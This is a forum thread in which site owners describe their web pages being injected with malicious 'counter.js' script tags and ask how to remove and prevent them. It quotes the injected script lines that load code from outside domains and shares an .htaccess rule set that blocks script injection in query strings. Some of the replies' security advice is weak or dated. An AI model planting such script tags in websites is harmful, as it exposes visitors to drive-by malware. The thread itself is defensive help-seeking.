Acute help - Server hit by virus!

W

Wireless

New Member
Hello everybody

We are seeking urgent advice and guidance and hope for your help!

Our website has unfortunately been hit by a virus (or several) and we therefore urgently need help and we would be extremely grateful for any advice.

We have our server at Hetzner.de

Problem 1: Removing a virus
Acute is our need to solve the problem of how we get rid off the virus on a server?
We have until now run into 2 viruses with different filenames, they are as follows:
sa-rpg.net/counter.js and sitesenfolies.com/counter.js

When you surf around our website, you meet the virus on more or less all sides.
It is not worse than you can close the virus threat again, if you f.ex. use AVG Free Antivirus. (IF you have antivirus, which many unfortunately do not have). It is a situation that feels even worse, because we know nothing about what we can do and how we do it ..

Problem 2: Cause and protection, how can we avoid viruses?
How to install antivirus or similar on a server?
The cause of the virus have entered is obviously relevant to us, so that we can protect ourselves, which we have not been aware of was our own responsibility by Hetzner.
We have no knowledge or experience with virus protection on a server.. this is a point where we also hope you will share your knowledge with us.

We have little doubt about what information we should provide for you to advice and/or help us, so do not hesitate asking for more detailed information.

Thanks in advance for your help - any input is welcome!
 
What operating system are you running on the server? Is it fully patched? It seems you may be having java script issues.
 
Thanks for the answer John

The operating system is Linux, but I don't know what you mean by "fully patched"? We are not server administrators.

Do you have a reason, why you think it is because of javascript issues and advice to what we can do to check where the virus is and how we can remove it??

We are still hoping for more help and advice - Thank you!
 
Hi,
Our Cpanel is Parallels Plesk Panel 9.5 and we can see there is a firewall but it seems to be set to allow access from all except from forwarding traffic.

Antivirus
We just went in under 'updates' while looking for some anitvirus settings. We found that there are updates for the cpanel we haven't installed and when selecting the latest 10.2 we can see that the components we can select includes 'Kaspersky antivirus' and 'Parallels Premium antivirus', these are not installed and not selected by default.

Can this be here we install the antivirus or is it not enough?
We assume it's both covering protection and scanning, do you have any experience with this?
 
sa-rpg.net/counter.js and sitesenfolies.com/counter.js

If these are the filenames that AVG is saying thats bad then .js refers to java script. It could be bad written page or you have ads on the pages that AVG doesn't like. You need to contact a network admin that knows what he is doing to sort out your issue.
 
Same problem here

Hi,

I have the same problem here...
Some Javascript Injection in my index pages (i have 3 index.html and index.php)
The line is :
<script type="text/javascript" src="http://www.myspice.ro/counter.js"></script>
or
<script type="text/javascript" src="http://www.hnldesigns.com/counter.js"></script>
or...
the url changes everytime, but it always "counter.js".

I really dont know how to prevent that...
I changed my ftp password but that dont fix it...
I'll try to change the permission on these files but... :s

If someone encounter the same problem and find a solution, i'll be glad to hear it :)
 
Hi,
I'll post what i have done, maybe it will help someone.
I put a .htaccess file with these lines :

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

SetEnv REGISTER_GLOBALS 0
SetEnv ZEND_OPTIMIZER 1
SetEnv MAGIC_QUOTES 1
SetEnv PHP_VER 5

I think the most important thing is to set the variable register_globals to 0 (or off, depend of your host).
Till, i didnt have anymore matters. (exept the fact that google think my website is dangerous v_v).

Hope that help a little bit. (and sorry for my bad english ^^')
 
You must log in or register to reply here.
Back
Top